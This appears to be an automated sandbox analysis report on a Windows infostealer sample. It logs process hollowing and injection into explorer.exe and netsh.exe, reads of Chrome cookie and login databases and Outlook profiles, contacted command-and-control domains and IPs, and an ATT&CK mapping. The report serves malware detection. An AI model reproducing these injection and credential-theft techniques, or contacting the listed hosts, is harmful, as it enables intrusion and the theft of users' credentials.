          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0042193D
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00421284
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0040B453
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0040B457
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00422429
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0040FE87
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00B2A9AA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00B134E0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00B1C4C0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00B18E70
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: String function: 00B1D900 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: String function: 00B22574 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041E087 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041DEA7 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041DF57 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041DFD7 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041E081 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004012A4 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041DF52 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_0041DFD2 NtClose,
          Source: qHpeBvr9cR.exe | ReversingLabs: Detection: 41%
          Source: qHpeBvr9cR.exe | Virustotal: Detection: 36%
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | File read: C:\Users\user\Desktop\qHpeBvr9cR.exe
          Source: qHpeBvr9cR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\qHpeBvr9cR.exe C:\Users\user\Desktop\qHpeBvr9cR.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile created: C:\Users\user\AppData\Local\Temp\nsx95CB.tmp
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/4
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --server
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCommand line argument: --server
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25A15 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004210E9 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_004210F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0042109C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00421153 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040EAA3 push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041E5D0 push ecx; iretd
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00419F38 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0041FF93 push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25A15 push ecx; ret
          Source: febcldoukq.exe.0.drStatic PE information: section name: .00cfg
          Source: febcldoukq.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeFile created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeAPI coverage: 2.6 %
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25293 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25293 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.338206694.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2258B GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2009E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B2418D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2009E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B2418D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_0040C317 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D720 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1D720 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\febcldoukq.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeThread register set: target process: 3324
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeProcess created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.340255020.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.303378350.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.356013433.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D945 cpuid
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          MITRE ATT&CK matrix, listed per tactic column (a number printed before a technique is kept exactly as the report shows it):

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: 2 Command and Scripting Interpreter; 1 Shared Modules; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: 512 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: 1 Disable or Modify Tools; 1 Virtualization/Sandbox Evasion; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; Steganography; Compile After Delivery
          Credential Access: 1 OS Credential Dumping; 11 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: 1 System Time Discovery; 131 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 15 System Information Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: 1 Email Collection; 11 Input Capture; 1 Archive Collected Data; 1 Data from Local System; 2 Clipboard Data; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
          Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Data Encrypted for Impact
          Behavior Graph (ID: 756313, Sample: qHpeBvr9cR.exe, Startdate: 30/11/2022, Architecture: WINDOWS, Score: 100), recovered from the graph rendering as text:

          • Root signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 5 other signatures. Domain: www.19t221013d.tokyo.
          • qHpeBvr9cR.exe started; drops C:\Users\user\AppData\...\febcldoukq.exe (PE32) and starts febcldoukq.exe.
          • febcldoukq.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; starts a second febcldoukq.exe.
          • febcldoukq.exe (second instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injects into explorer.exe.
